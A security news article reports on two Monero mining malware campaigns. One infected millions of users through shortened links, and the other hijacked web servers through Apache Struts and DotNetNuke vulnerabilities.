More Than 15 Million Users Infected with Monero Mining Malware

A large-scale malicious campaign has surreptitiously installed “mining” software for the Monero cryptocurrency on at least 15 million—and as many as 30 million—systems around the world.

The campaign has been active for the past four months, according to researchers from security firm Palo Alto Networks. They estimated the number of victims by analyzing statistics from Bitly, a URL shortening service abused by the attackers.

“It’s important to note that the actual number of victims is likely much higher because less than half of the samples we identified in this campaign leverage bitly,” the researchers said in a blog post. “If we postulate that the bitly telemetry is typical for this operation, we can extrapolate to speculate that as many as 30 million people have been affected by this operation.”

Another URL shortening service frequently abused in this campaign was AdFly, a service that allows users to create shortened URLs and get paid small commissions when other users visit those links and are shown ads during the redirects.

The attacks trick users into clicking on the rogue links, which then redirect them to malicious executable files that use VBS scripts to install XMRig, an open source Monero mining application. The Palo Alto researchers have observed more than 250 unique malicious samples associated with this campaign, many of which were hosted on the 4sync online cloud storage provider.

The victims are distributed globally, but the highest number of impacted users appear to be in southeast Asia, northern Africa and South America.

Compared to other cryptocurrencies, Monero can be mined on commodity hardware such as home PCs. This has created an incentive for attackers to hijack other people’s computing resources for this purpose, especially since Monero also can be mined in the browser through code launched from malicious or compromised websites.

“Monero mining campaigns are certainly not a new development, as there have been various reported instances recently,” the Palo Alto researchers said. “However, it is less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time. By targeting random end-users (sic) via malicious advertisements, using seemingly innocuous names for the malware files, and using both built-in Windows utilities and scripting files, the attackers are able to gain a foothold on victim systems at large scale.”

Such campaigns can also affect companies because cryptocurrency mining has a significant impact on computers’ performance. This means infected business computers might not be able to run applications efficiently, resulting in lower productivity for employees.

Different Mining Campaign Hits Web Servers

Security researchers from Trend Micro have spotted a different malicious Monero mining operation that hijacks business web servers by exploiting vulnerabilities in Apache Struts and the DotNetNuke content management system.

The attacks observed by Trend Micro use exploits for CVE-2017-5638, the Apache Struts vulnerability that led to the Equifax breach, and CVE-2017-9822, a vulnerability patched in July in DNN and EVOQ platforms. DNN, previously known as DotNetNuke, is a CMS written in Microsoft .NET that’s popular with companies.

“We believe that this is the work of a single threat actor, as the sites all point to a single malicious domain to download Monero miners, which also all point to a single Monero address,” the researchers said in a blog post. “It has already received 30 XMR [Monero], equating to approximately 12,000 US dollars based on mid-January 2018 exchange rates.”

Servers are an attractive target for cryptocurrency miners because they have more computing power than laptop and desktop computers. They also run various services and applications that can be directly accessible from the internet and vulnerable to attacks.

For example, Apache Struts is a popular framework for building Java-based web applications. It has been targeted frequently by hackers over the past couple of years and has had several critical vulnerabilities during that time frame.

“System administrators have to adjust to the reality that Struts attacks are now a regular part of the threat landscape,” the Trend Micro researchers said.

Lucian Constantin

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 298 posts and counting.See all posts by lucian-constantin